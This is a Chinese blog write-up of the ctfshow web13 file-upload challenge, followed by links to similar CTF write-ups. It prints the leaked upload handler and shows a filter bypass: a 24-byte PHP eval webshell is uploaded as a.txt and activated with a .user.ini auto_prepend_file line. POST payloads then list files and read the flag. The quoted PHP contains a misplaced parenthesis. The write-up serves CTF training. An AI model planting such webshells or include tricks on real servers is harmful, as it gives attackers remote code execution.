CTF_ctfshow_web13_文件上传漏洞

最新推荐文章于 2024-07-05 23:15:43 发布
最新推荐文章于 2024-07-05 23:15:43 发布
阅读量1.4k 收藏 7
点赞数 1
分类专栏: CTF 文章标签: 文件上传漏洞 PHP源码审计 auto_prepend_file flag获取 代码注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54227009/article/details/124769416
版权

打开靶机发现是个文件上传漏洞,上传了图片这些,都提示太大了

10344c8d-1054-45ac-ac38-f99ae5d4e476.challenge.ctf.show/upload.php.bak

然后upload.php.bak下载下来了源码,进行审计:

<?php 
    header("content-type:text/html;charset=utf-8");
    $filename = $_FILES['file']['name'];
    $temp_name = $_FILES['file']['tmp_name'];
    $size = $_FILES['file']['size'];
    $error = $_FILES['file']['error'];
    //pathinfo — 返回文件路径的信息
    $arr = pathinfo($filename);
    $ext_suffix = $arr['extension'];
    //文件<=24
    if ($size > 24){
        die("error file zise");
    }
    //文件名字长度<=9
    if (strlen($filename)>9){
        die("error file name");
    }
    //文件后缀<=3
    if(strlen($ext_suffix)>3){
        die("error suffix");
    }
    //后缀过滤掉了大小写的php
    if(preg_match("/php/i",$ext_suffix)){
        die("error suffix");
    }
    //文件名字也过滤了大小写的php
    if(preg_match("/php/i"),$filename)){
        die("error file name");
    }
    //满足以上则上传成功
    if (move_uploaded_file($temp_name, './'.$filename)){
        echo "文件上传成功!";
    }else{
        echo "文件上传失败!";
    }

 ?>
代码审计之后,我们可以构造一个一句话的文本文件

<?php eval($_POST['a']);

大小刚好24

然后构造一个.user.ini文件

auto_prepend_file=a.txt

作用,该目录下的所有文件都会包含a.txt

对于php中的.usr.ini有如下解释:
PHP 会在每个目录下搜寻的文件名;如果设定为空字符串则 PHP 不会搜寻。也就是在.usr.ini中如果设置了文件名,那么任意一个页面都会将该文件中的内容包含进去。
我们在.usr.ini中输入auto_prepend_file =a.txt,这样在该目录下的所有文件都会包含a.txt的内容

上传a.txt、上传.user.ini

上传成功之后,但我蚁剑这里连接不上,可能是.txt文件蚁剑无法通过php进行解析吧,我是这样理解的,可以在url上访问一下刚刚上传的文件

 那就直接构造参数吧,这里用post发送,我get试过了,不行,

查看当前目录有哪些文件:a=print_r(glob("*"));

 直接高亮flag

a=highlight_file("903c00105c0141fd37ff47697e916e53616e33a72fb3774ab213b3e2a732f56f.php");

得到flag

ctfshow{afec4dce-665f-40a6-b2ee-25874cbfe778}

鸡肋是鸡肋!
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
2024年网络安全山东省赛-SMB信息收集解析(中职组)_使用访问工具对服务器服务访问,将服务器中管理员桌面的文本文档里的内容作为 flag
2401_84252281的博客
04-26 864
任务环境说明:服务器场景:Server1。
2024年网络安全最全ctfshow-WEB-web5_ctfshow web5
2401_84281698的博客
05-03 520
ctf.show WEB模块第5关需要传递两个参数,一个字符串,一个数字,并且两个参数的md5值必须相同,我们可以利用md5的0e漏洞进行绕过0e绕过是指:0e开头的字符串在参与弱类型比较时,会被当做科学计数法,结果转换为0;我们只要传入两个md5值是以0e开头的参数,即可绕过md5加密,夺取flag页面中展示了部分源码,从源码中我们可以得知,想要夺旗需要通过GET请求传递两个参数v1和v2,并且参数v1必须是纯字母字符串,参数v2必须是数字或者数字字符串,并且两个参数的md5值必须相等。
CTFshow-web-web13
qq_68581192的博客
10-27 257
user.ini中两个中的配置就是auto_prepend_file和auto_append_file。这两个配置的意思就是:我们指定一个文件(如1.jpg),那么该文件就会被包含在要执行的php文件中(如index.php),相当于在index.php中插入一句:require(./1.jpg)。由于后缀问题服务器无法解析该php语句,我们先上传a.txt,再上传.user.ini文件。先尝试在url后添加/upload.php.bak,发现直接下载了,我们打开下载的。.DS_Store文件泄漏。
ctfshow-web13 文件上传
HAI_WD的博客
08-25 1407
首先看到是一个上传页面,测试其他无果,遂进行目录遍历,发现upload.php.bak文件。然后上传1.txt,尝试使用get,但是没有生效,这里需要控制字符数量。上传好了之后,通过index.php进行访问。然后通过highlight_file读取文件。那么我们先上传.user.ini。
CTF WebCTFShow web13 Writeup(RCE+PHP+通配符)
HEX9CF的技术博客
05-29 530
1阿呆彻底呆了,阿呆拿起谷姐搜索好久,终于找到更狠的方法。
CTF show WEB13
羽的博客
02-18 5078
题目地址:http://ctf.show 进入题目是个文件上传的题目,尝试了一番文件上传漏洞利用的方法后,没有啥突破,可能有啥隐藏的目录,尝试源码泄露利用的方法,在输入upload.php.bak时成功下载下来源码。 .bak文件是备份文件。 这里列举一下常见的源码泄露 .hg源码泄漏 .git源码泄漏 .DS_Store文件泄漏,还有以.phps .bak结尾的网页 在we...
CTF.show:web13
qq_46230755的博客
01-15 1902
扫描后发现存在upload.php.bak .bak文件是备份文件。 这里列举一下常见的源码泄露 .hg源码泄漏 .git源码泄漏 .DS_Store文件泄漏 .phps .bak结尾的网页 <?php header("content-type:text/html;charset=utf-8"); $filename = $_FILES['file']['name']; $temp_name = $_FILES['file']['tmp_name']; $size = $_FILES.
ctfshow-萌新-web13( 利用代码执行漏洞获取网站敏感文件)
热门推荐
wangyuxiang946的博客
09-11 1万+
ctf.show萌新模块 web13关, 这一关的考点是代码执行漏洞, 需要灵活的运用各种命令执行函数, 源码中过滤了system, exec, highlight函数, cat命令, congfig, php, 点和分号等关键字, 推荐使用反引号`` 进行绕过 页面中展示了部分源码, 并提示 flag 就在 config.php 文件中 源码中过滤了参数中的 system exec highlight cat . ; file php config 等关键字, 这里可以使用 pass...
ctfshow web13-14
qq_61988806的博客
12-12 1078
ctfshow web13-14 文件上传的题 想办法搞到源码 常见得到源码的方法 .bak .git .hg 这里使用.bak得到源码 下载得到源码
ctfshow-萌新-web13( 利用代码执行漏洞获取网站敏感文件)_ctfshow web13(1)
2301_82242964的博客
05-02 37
页面中展示了部分源码, 并提示 flag 就在 config.php 文件中源码中过滤了参数中的 system exec highlight cat .;file php config 等关键字, 这里可以使用 passthru()函数 配合反引号`` 来执行系统命令, 针对分号;的过滤, 我们可以使用?> 代替 分号, 首先查看当前目录下的文件由结果可以确认 config.php 文件的位置, 就在当前目录下接下来读取config.php文件的内容, payload如下。
2024年网安最新ctfshow-WEB-web6_ctf(1)
2401_84297899的博客
05-03 948
ctf.show WEB模块第6关是一个SQL注入漏洞,注入点是单引号字符型注入,并且过滤了空格,我们可以使用括号()或者注释/**/绕过先来一个万能账号,注意使用括号()替换空格,用户名输入以下payload,密码随便输成功登录既然是SQL注入漏洞,那么flag肯定就藏在当前使用的数据库中,我们使用获取当前使用的数据库,用户名输入以下payload,密码随便输当前数据库是web2。
2024年网安最全ctfshow-WEB-web6_ctf(3)
2401_84264583的博客
05-03 725
先来一个万能账号,注意使用括号()替换空格,用户名输入以下payload,密码随便输成功登录既然是SQL注入漏洞,那么flag肯定就藏在当前使用的数据库中,我们使用获取当前使用的数据库,用户名输入以下payload,密码随便输当前数据库是web2接下来获取数据库中的所有表,用户名输入一下payload,密码随便输,如果直接复制payload,记得删掉内容中的空格等特殊字符,尽量使整个内容保持在一行,否则空格或换行符会使结果出错成功获取数据库中的表 flag , user。
ctfshow web150_plus
qq_59970501的博客
10-21 677
web150_plus 源码 include("flag.php"); error_reporting(0); highlight_file(__FILE__); ​ class CTFSHOW{ private $username; private $password; private $vip; private $secret; ​ function __construct(){ $this->vip = 0; $thi...
CTFSHOW系列-web13(信息收集-技术文档泄露)
siu~
11-27 589
CTFSHOW系列解题思路
ctfshow web13 文件上传.user.ini
m0_46412682的博客
07-16 2024
ctfshow web13 文件上传 开始的页面 先上传一张正常的照片,显示error file size,这张图片是886k,再上传一张小的照片还是error file size 不管先,上传一句话木马1.php,提示错误,应该是过滤了后缀名 现在上传1.txt,内容为<?php eval($_GET[‘w’]);?>,还是文件大小问题 内容改小一点<?php eval($_GET[w]); 这里我们实现能不能上传.htaccess文件,这里是上传不了 之前再buuctf中有道也是文件
CTFshow 信息收集 web13
Kradress的博客
10-23 313
根据提示 技术文档里面不要出现敏感信息,部署到生产环境后及时修改默认密码 查看源码,发现有几个可以访问的网页 仔细查看每个网页的源码后,在Products.html中发现 pdf文件 点开pdf文件,根据信息访问后台,输入账号密码,拿到flag ...
CTF Web】XCTF GFSJ0485 simple_php Writeup(代码审计+GET请求+PHP弱类型漏洞
HEX9CF的技术博客
05-06 426
小宁听说php是最好的语言,于是她简单学习之后写了几行php代码。
CTF-show WEB入门--web13
m0_73912575的博客
01-03 450
CTF-show WEB入门--web13
CTFSHOW 萌新web13
最新发布
weixin_44833249的博客
07-05 127
冒号这个过滤可以用?>来绕过,让程序运行到这里就终止,而在php中,最后一句话是不需要用分号;相比于12题 多了冒号:,点.file的匹配。
ctfshow web 41
08-20
根据引用,ctfshow web 41 是一个命令盲注脚本,它属于ctfshow靶场的web入门系列。根据引用,这个脚本可能存在一些问题,所以如果你有任何问题,可以向ctfshow web 41的作者提问。根据引用,在ctfshow web 41的实现中,已经过滤了一些特殊字符和关键词,如";"、"cat"、"flag"、空格等。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [ctfshow web139命令盲注脚本](https://download.csdn.net/download/eason612/86793746)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [CTFshow web入门 web41~web55 命令执行](https://blog.csdn.net/qq_56815564/article/details/130175421)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值